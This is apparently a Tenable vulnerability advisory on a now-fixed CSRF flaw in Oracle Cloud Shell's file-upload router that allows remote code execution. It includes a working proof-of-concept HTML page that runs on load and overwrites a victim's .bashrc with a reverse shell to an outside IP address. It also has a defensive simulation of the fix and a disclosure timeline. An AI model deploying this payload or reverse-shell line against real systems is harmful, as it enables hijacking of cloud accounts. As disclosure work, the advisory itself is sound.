
Oracle Cloud Remote Code Execution Vulnerability on Cloud Shell and Code Editor's integrated services

High

Synopsis

Tenable Research discovered a Remote Code Execution (RCE) vulnerability (now remediated) in Oracle Cloud Infrastructure’s (OCI) Code Editor - a service designed for developers working within Oracle’s Cloud Shell ecosystem. By chaining together subtle misconfigurations, we demonstrated how an attacker could silently 1-click hijack a victim’s Cloud Shell environment and potentially pivot across OCI services. Attackers could also abuse the vulnerability to exploit Code Editor’s integrated services such as Resource Manager, Functions and Data Science.


The vulnerability is exploited through CSRF (cross-site request forgery) against the Cloud Shell router domain. By abusing it, attackers can deploy or overwrite files in the victim’s Cloud Shell with a malicious payload and then take over the victim’s service.

Attack details:

  1. The router upload works with cookie authentication, and the “CS-ProxyChallenge” cookie’s SameSite attribute is set to None on the router.cloudshell.us-ashburn-1.oci.oraclecloud.com domain. SameSite is a browser cookie attribute introduced in 2016; its default value is "Lax". Its purpose is to protect against cross-site information leakage and attacks such as cross-site request forgery (CSRF). According to the request for comments (RFC), the "None" value provides no protection against cross-site attacks.
  2. The upload accepts the multipart/form-data content type, which is one of the three content types a browser will send in a cross-origin request without a CORS preflight.
  3. The request is an HTTP POST, which the browser also allows cross-origin, and it requires no additional custom headers.
  4. With a request of this kind and no additional defenses against cross-origin/CSRF attacks, attackers can abuse it to upload malicious files to Cloud Shell on behalf of the victim.

Steps to reproduce:

  1. Host a server
  2. Create a malicious HTML file that uses JavaScript to send a request to the vulnerable file-upload endpoint (see our example code below)
  3. The authenticated victim navigates to your payload on the hosted server, then works with Oracle’s Cloud Shell as usual
  4. The .bashrc file runs on shell initialization, so your code runs in the victim’s Cloud Shell
  5. Optional: use the OCI CLI to abuse the associated Oracle Cloud identity and move laterally to other cloud services

POC code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TCS Research POC</title>
    <script>
        function submitForm() {
            var xhr = new XMLHttpRequest();
            var boundary = "random";
            var url = "https://router.cloudshell.us-ashburn-1.oci.oraclecloud.com/file-upload";
            var fileData = `# .bashrc
if [ -f /etc/bashrc ]; then
    . /etc/bashrc
fi

source /etc/bashrc.cloudshell
bash -i >& /dev/tcp/35.11.123.123/4040 0>&1`;
            var fileName = "refxss.html";
            var nameVar = "file";
            var filePath = "file:///home/lmatan/.bashrc";
            var boundaryPrefix = "----webkitformboundary";
            var body = "--" + boundaryPrefix + boundary + "\r\n";
            body += 'Content-Disposition: form-data; name="uri"\r\n\r\n';
            body += filePath + "\r\n";
            body += "--" + boundaryPrefix + boundary + "\r\n";
            body += 'Content-Disposition: form-data; name="' + nameVar + '"; filename="' + fileName + '"\r\n';
            body += "Content-Type: text/html\r\n\r\n";
            body += fileData + "\r\n";
            body += "--" + boundaryPrefix + boundary + "--\r\n";
            var blob = new Blob([body], { type: "multipart/form-data; boundary=" + boundaryPrefix + boundary });
            xhr.open("POST", url, true);
            xhr.withCredentials = true;
            xhr.send(blob);
        }
        window.onload = submitForm;
    </script>
</head>
<body>
    <h1>TCS Research RCE POC</h1>
    <p>...</p>
</body>
</html>

We are publishing this report ahead of Oracle’s scheduled July CPU as we have observed and confirmed with Oracle that the issue is fixed.

Solution

In response to this discovery, Oracle Cloud fixed the vulnerability by requiring a custom header x-csrf-token:csrf-value.
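As an added illustration, not Oracle’s code or Tenable’s POC, the following JavaScript models the three conditions listed under Attack details and the effect of the fix described above. The functions isSimpleRequest, cookieSentCrossSite, serverAccepts and simulateCrossSiteUpload, the request objects and the policy shape are all constructed for this example; only the upload URL and the x-csrf-token header name are taken from the advisory.

```javascript
// Added example (not Oracle's code): a model of why a cookie-authenticated multipart
// POST with a SameSite=None cookie is reachable cross-site, and why requiring a
// custom header (x-csrf-token, as in the fix) stops it.

const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SIMPLE_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
// The three content types a browser sends cross-origin without a CORS preflight.
const SIMPLE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// Case-insensitive header lookup on a plain { name: value } object.
function getHeader(headers, name) {
  const want = name.toLowerCase();
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() === want) return v;
  }
  return undefined;
}

// True when a browser would send this request cross-site with no preflight
// (a CORS "simple request"). Any custom header, such as x-csrf-token, makes it false.
function isSimpleRequest(req) {
  if (!SIMPLE_METHODS.has(req.method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(req.headers)) {
    const lower = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(lower)) return false;
    if (lower === "content-type") {
      const mime = value.split(";")[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mime)) return false;
    }
  }
  return true;
}

// True when the browser attaches a cookie with this SameSite value to a cross-site
// request. `navigation` is true for a top-level navigation, false for XHR/fetch.
function cookieSentCrossSite(sameSite, method, navigation) {
  switch ((sameSite || "Lax").toLowerCase()) {
    case "none":
      return true;   // no cross-site protection: the vulnerable setting in the advisory
    case "strict":
      return false;
    default:         // Lax, the browser default
      return navigation && ["GET", "HEAD"].includes(method.toUpperCase());
  }
}

// Server-side acceptance check for the upload endpoint (constructed policy shape).
// requireCsrfHeader=false models the pre-fix behaviour; true models the fix.
function serverAccepts(req, policy) {
  if (req.method.toUpperCase() !== "POST") return { ok: false, reason: "method not allowed" };
  if (!req.cookieAttached) return { ok: false, reason: "no session cookie" };
  if (policy.requireCsrfHeader && getHeader(req.headers, "x-csrf-token") === undefined) {
    return { ok: false, reason: "missing x-csrf-token header" };
  }
  return { ok: true, reason: "accepted" };
}

// Simulate an attacker-controlled page issuing `req` from JavaScript while the
// victim's browser holds the session cookie with the given SameSite value.
function simulateCrossSiteUpload(req, sameSite, policy) {
  // A non-simple request triggers a preflight; an endpoint that does not list the
  // custom header in Access-Control-Allow-Headers never receives the real request.
  if (!isSimpleRequest(req)) return { ok: false, reason: "blocked by CORS preflight" };
  const delivered = { ...req, cookieAttached: cookieSentCrossSite(sameSite, req.method, false) };
  return serverAccepts(delivered, policy);
}

// Constructed request in the shape of the advisory's POC: multipart POST, no custom header.
const UPLOAD_URL = "https://router.cloudshell.us-ashburn-1.oci.oraclecloud.com/file-upload";
const pocRequest = {
  method: "POST",
  url: UPLOAD_URL,
  headers: { "Content-Type": "multipart/form-data; boundary=----webkitformboundaryrandom" },
};
// The same request with the header the fix requires, added by the cross-site page.
const pocWithHeader = {
  ...pocRequest,
  headers: { ...pocRequest.headers, "x-csrf-token": "csrf-value" },
};

const scenarios = [
  ["SameSite=None, no header required (pre-fix)", pocRequest, "None", { requireCsrfHeader: false }],
  ["SameSite=Lax, no header required", pocRequest, "Lax", { requireCsrfHeader: false }],
  ["SameSite=None, header required (fix)", pocRequest, "None", { requireCsrfHeader: true }],
  ["SameSite=None, header required, page adds header", pocWithHeader, "None", { requireCsrfHeader: true }],
];

for (const [label, req, sameSite, policy] of scenarios) {
  const r = simulateCrossSiteUpload(req, sameSite, policy);
  console.log(`${label}: ${r.ok ? "upload succeeds" : "blocked"} (${r.reason})`);
}
```

Run it with node. The fourth scenario is the one that explains the fix: when the cross-site page tries to add the required header itself, the request is no longer a CORS simple request, the browser issues a preflight, and an endpoint that does not grant that header never sees the upload. The second scenario shows that a SameSite=Lax cookie alone would also have stopped the XHR POST, since Lax cookies are only attached to top-level GET navigations.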

Disclosure Timeline

March 16, 2025 - Tenable reported the finding to Oracle
March 17, 2025 - Oracle acknowledges
March 18, 2025 - Oracle assigns a tracking number to the issue and Tenable acknowledges
March 24, 2025 - Oracle sends a status report - Under investigation / Being addressed in underlying software
April 8, 2025 - Tenable asks for the investigation status
April 9, 2025 - Oracle asks for the POC video again, Tenable attaches
April 10, 2025 - Oracle asks to delay disclosure to July because of missing information
April 18, 2025 - Oracle is unable to reproduce the issue and asks for clarification
April 19, 2025 - Tenable clarifies the issue and reproduces it again successfully
April 24, 2025 - Oracle sends a status report - Under investigation / Being addressed in underlying software
May 7, 2025 - Tenable asks for an update on the issue
May 8, 2025 - Oracle says they fixed this issue and deployment is in progress
May 19, 2025 - Tenable asks for an update on the issue
May 19, 2025 - Oracle says they fixed this issue and deployment is in progress
May 20, 2025 - Tenable can no longer reproduce the vulnerability and reminds Oracle that we intend to publicly disclose on June 14
May 21, 2025 - Oracle requests a disclosure delay to July 25
May 30, 2025 - Tenable requests a call to discuss the disclosure
June 6, 2025 - Oracle replies explaining their process
June 10, 2025 - Tenable replies that we intend to publish as previously indicated since the issue appears to be fixed
June 11, 2025 - Oracle replies acknowledging

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2025-19
Credit:
Liv Matan
Affected Products:
Oracle Cloud’s Cloud Shell
Oracle Cloud Code Editor
Oracle Cloud Resource Manager
Oracle Cloud Functions
Oracle Cloud Data Science
Risk Factor:
High

Advisory Timeline

June 16, 2025 - Initial release.